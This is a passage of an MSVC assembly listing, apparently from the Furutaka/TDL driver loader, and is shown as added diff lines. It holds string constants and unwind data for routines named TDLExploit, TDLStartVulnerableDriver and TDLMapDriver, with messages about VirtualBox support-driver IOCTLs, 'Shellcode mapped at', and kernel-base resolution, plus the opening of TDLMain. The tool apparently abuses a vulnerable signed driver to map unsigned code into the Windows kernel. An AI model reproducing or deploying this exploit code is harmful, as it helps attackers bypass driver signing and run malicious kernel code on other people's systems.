+??_C@_07IPICGNAN@ZwClose@ DB 'ZwClose', 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@
+CONST SEGMENT
+??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'P', 00H, 's', 00H
+ DB 'C', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 't', 00H, 'e', 00H, 'S'
+ DB 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'T', 00H
+ DB 'h', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 'd', 00H, ' ', 00H, '0'
+ DB 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@
+CONST SEGMENT
+??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'P', 00H, 's'
+ DB 00H, 'C', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 't', 00H, 'e', 00H
+ DB 'S', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'T'
+ DB 00H, 'h', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 'd', 00H, ' ', 00H
+ DB 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's', 00H, 's'
+ DB 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'f', 00H
+ DB 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@
+CONST SEGMENT
+??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ DB 'PsCreateSystemThread', 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@
+CONST SEGMENT
+??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'x', 00H
+ DB 'A', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H, 'a', 00H, 't'
+ DB 00H, 'e', 00H, 'P', 00H, 'o', 00H, 'o', 00H, 'l', 00H, 'W', 00H
+ DB 'i', 00H, 't', 00H, 'h', 00H, 'T', 00H, 'a', 00H, 'g', 00H, ' '
+ DB 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@
+CONST SEGMENT
+??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'E', 00H, 'x'
+ DB 00H, 'A', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H, 'a', 00H
+ DB 't', 00H, 'e', 00H, 'P', 00H, 'o', 00H, 'o', 00H, 'l', 00H, 'W'
+ DB 00H, 'i', 00H, 't', 00H, 'h', 00H, 'T', 00H, 'a', 00H, 'g', 00H
+ DB ' ', 00H, 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's'
+ DB 00H, 's', 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H
+ DB 'f', 00H, 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@
+CONST SEGMENT
+??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ DB 'ExAllocatePoolWithTag', 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@
+CONST SEGMENT
+??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'n', 00H, 't', 00H
+ DB 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H, 'l', 00H, '.'
+ DB 00H, 'e', 00H, 'x', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H
+ DB 'a', 00H, 'd', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't'
+ DB 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
+CONST SEGMENT
+??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i'
+ DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H
+ DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'n', 00H, 't'
+ DB 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H, 'l', 00H
+ DB '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@
+CONST SEGMENT
+??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ DB 'n'
+ DB 00H, 't', 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H
+ DB 'l', 00H, '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@
+CONST SEGMENT
+??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'L', 00H, 'o', 00H
+ DB 'a', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'n'
+ DB 00H, 't', 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H
+ DB 'l', 00H, '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@
+CONST SEGMENT
+??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'I', 00H, 'n', 00H
+ DB 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i'
+ DB 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i', 00H
+ DB 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd'
+ DB 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't', 00H, ' ', 00H
+ DB '0', 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
+CONST SEGMENT
+??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i'
+ DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H
+ DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'i', 00H, 'n'
+ DB 00H, 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'd', 00H, 'r', 00H
+ DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i'
+ DB 00H, 'l', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@
+CONST SEGMENT
+??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'K', 00H, 'e', 00H
+ DB 'r', 00H, 'n', 00H, 'e', 00H, 'l', 00H, ' ', 00H, 'b', 00H, 'a'
+ DB 00H, 's', 00H, 'e', 00H, ' ', 00H, '=', 00H, ' ', 00H, '0', 00H
+ DB 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+CONST SEGMENT
+??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
+ DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
+ DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'F', 00H
+ DB 'R', 00H, 'E', 00H, 'E', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+CONST SEGMENT
+??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
+ DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
+ DB 00H, '_', 00H, 'F', 00H, 'A', 00H, 'S', 00H, 'T', 00H, '_', 00H
+ DB 'D', 00H, 'O', 00H, '_', 00H, 'N', 00H, 'O', 00H, 'P', 00H, 00H
+ DB 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+CONST SEGMENT
+??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
+ DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
+ DB 00H, '_', 00H, 'S', 00H, 'E', 00H, 'T', 00H, '_', 00H, 'V', 00H
+ DB 'M', 00H, '_', 00H, 'F', 00H, 'O', 00H, 'R', 00H, '_', 00H, 'F'
+ DB 00H, 'A', 00H, 'S', 00H, 'T', 00H, ' ', 00H, 'c', 00H, 'a', 00H
+ DB 'l', 00H, 'l', 00H, ' ', 00H, 'c', 00H, 'o', 00H, 'm', 00H, 'p'
+ DB 00H, 'l', 00H, 'e', 00H, 't', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+CONST SEGMENT
+??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
+ DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
+ DB 00H, '_', 00H, 'S', 00H, 'E', 00H, 'T', 00H, '_', 00H, 'V', 00H
+ DB 'M', 00H, '_', 00H, 'F', 00H, 'O', 00H, 'R', 00H, '_', 00H, 'F'
+ DB 00H, 'A', 00H, 'S', 00H, 'T', 00H, ' ', 00H, 'c', 00H, 'a', 00H
+ DB 'l', 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l'
+ DB 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@
+CONST SEGMENT
+??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ DB 0dH
+ DB 00H, 0aH, 00H, 09H, 00H, 'D', 00H, 'r', 00H, 'i', 00H, 'v', 00H
+ DB 'e', 00H, 'r', 00H, ' ', 00H, 'i', 00H, 'm', 00H, 'a', 00H, 'g'
+ DB 00H, 'e', 00H, ' ', 00H, 'm', 00H, 'a', 00H, 'p', 00H, 'p', 00H
+ DB 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't', 00H, ' ', 00H, '0'
+ DB 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@
+CONST SEGMENT
+??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ DB ','
+ DB 00H, ' ', 00H, 's', 00H, 'i', 00H, 'z', 00H, 'e', 00H, ' ', 00H
+ DB '=', 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+CONST SEGMENT
+??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
+ DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
+ DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'L', 00H
+ DB 'O', 00H, 'A', 00H, 'D', 00H, ',', 00H, ' ', 00H, 's', 00H, 'u'
+ DB 00H, 'c', 00H, 'c', 00H, 'e', 00H, 's', 00H, 's', 00H, 0dH, 00H
+ DB 0aH, 00H, 09H, 00H, 'S', 00H, 'h', 00H, 'e', 00H, 'l', 00H, 'l'
+ DB 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e', 00H, ' ', 00H, 'm', 00H
+ DB 'a', 00H, 'p', 00H, 'p', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a'
+ DB 00H, 't', 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+CONST SEGMENT
+??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
+ DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
+ DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'L', 00H
+ DB 'O', 00H, 'A', 00H, 'D', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l'
+ DB 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H
+ DB 'e', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@
+CONST SEGMENT
+??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'O', 00H, 'p', 00H
+ DB 'e', 00H, 'n', 00H, 'L', 00H, 'd', 00H, 'r', 00H, '.', 00H, 'u'
+ DB 00H, '.', 00H, 'O', 00H, 'u', 00H, 't', 00H, '.', 00H, 'p', 00H
+ DB 'v', 00H, 'I', 00H, 'm', 00H, 'a', 00H, 'g', 00H, 'e', 00H, 'B'
+ DB 00H, 'a', 00H, 's', 00H, 'e', 00H, ' ', 00H, '=', 00H, ' ', 00H
+ DB '0', 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+CONST SEGMENT
+??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
+ DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
+ DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'O', 00H
+ DB 'P', 00H, 'E', 00H, 'N', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l'
+ DB 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H
+ DB 'e', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_08EFILHJLF@furutaka@
+CONST SEGMENT
+??_C@_08EFILHJLF@furutaka@ DB 'furutaka', 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+CONST SEGMENT
+??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
+ DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
+ DB 00H, '_', 00H, 'C', 00H, 'O', 00H, 'O', 00H, 'K', 00H, 'I', 00H
+ DB 'E', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l', 00H, 'l', 00H, ' '
+ DB 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H
+ DB 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@
+CONST SEGMENT
+??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ DB 'The Magic Word!', 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@
+CONST SEGMENT
+??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ DB 'S'
+ DB 00H, 'o', 00H, 'f', 00H, 't', 00H, 'w', 00H, 'a', 00H, 'r', 00H
+ DB 'e', 00H, '\', 00H, 'O', 00H, 'r', 00H, 'a', 00H, 'c', 00H, 'l'
+ DB 00H, 'e', 00H, '\', 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H
+ DB 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 00H
+ DB 00H ; `string'
+CONST ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLMain DD 051501H
+ DD 06a7415H
+ DD 0680115H
+ DD 05006H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLProcessCommandLine DD 050f01H
+ DD 04a340fH
+ DD 048010fH
+ DD 07008H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLStopVulnerableDriver DD 060f01H
+ DD 0f640fH
+ DD 0e340fH
+ DD 0700bb20fH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLStartVulnerableDriver DD 091d01H
+ DD 08f641dH
+ DD 08e341dH
+ DD 088011dH
+ DD 0700cf00eH
+ DD 0500bH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLMapDriver DD 0b1f01H
+ DD 058341fH
+ DD 050011fH
+ DD 0e00ef010H
+ DD 0c00ad00cH
+ DD 060077008H
+ DD 05006H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLExploit DD 0d2601H
+ DD 06a7426H
+ DD 0696426H
+ DD 0683426H
+ DD 0620126H
+ DD 0e016f018H
+ DD 0c012d014H
+ DD 05010H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLResolveKernelImport DD 0c1c01H
+ DD 0c641cH
+ DD 0b541cH
+ DD 0a341cH
+ DD 0f018321cH
+ DD 0d014e016H
+ DD 07010c012H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLGetProcAddress DD 040a01H
+ DD 08340aH
+ DD 07006520aH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$TDLVBoxInstalled DD 020601H
+ DD 030025206H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$RtlSecureZeroMemory DD 020501H
+ DD 017405H
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLMain
+_TEXT SEGMENT
+osv$ = 32
+text$ = 320
+TDLMain PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 734
+$LN14:
+ mov QWORD PTR [rsp+8], rdi
+ push rbp
+ lea rbp, QWORD PTR [rsp-576]
+ sub rsp, 832 ; 00000340H
+; Line 743
+ xor ecx, ecx
+ call QWORD PTR __imp_GetModuleHandleW
+; Line 745
+ xor edx, edx
+ xor ecx, ecx
+ mov QWORD PTR g_hInstance, rax
+ call cuiInitialize
+; Line 747
+ lea rcx, OFFSET FLAT:??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
+ call QWORD PTR __imp_SetConsoleTitleW
+; Line 749
+ mov edx, 1
+ lea rcx, OFFSET FLAT:??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
+ call cuiPrintTextW
+; Line 751
+ mov eax, 1
+ lock xadd DWORD PTR g_lApplicationInstances, eax
+ inc eax
+; Line 752
+ cmp eax, 1
+ jle SHORT $LN5@TDLMain
+; Line 753
+ lea rcx, OFFSET FLAT:??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@
+$LN13@TDLMain:
+; Line 791
+ xor edx, edx
+ call cuiPrintTextW
+ or eax, -1 ; ffffffffH
+ jmp $LN3@TDLMain
+$LN5@TDLMain:
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ mov edx, 276 ; 00000114H
+ lea rdi, QWORD PTR osv$[rsp]
+ mov ecx, edx
+ xor eax, eax
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 761
+ lea rcx, QWORD PTR osv$[rsp]
+ mov DWORD PTR osv$[rsp], edx
+ call QWORD PTR __imp_RtlGetVersion
+; Line 762
+ cmp DWORD PTR osv$[rsp+4], 6
+ jae SHORT $LN6@TDLMain
+; Line 763
+ lea rcx, OFFSET FLAT:??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@
+; Line 765
+ jmp SHORT $LN13@TDLMain
+$LN6@TDLMain:
+; Line 768
+ mov eax, DWORD PTR osv$[rsp+12]
+; Line 770
+ lea rdx, OFFSET FLAT:??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@
+ lea rcx, QWORD PTR text$[rbp-256]
+ mov DWORD PTR g_NtBuildNumber, eax
+ call _strcpy_w
+; Line 771
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov ecx, DWORD PTR osv$[rsp+4]
+ mov rdx, rax
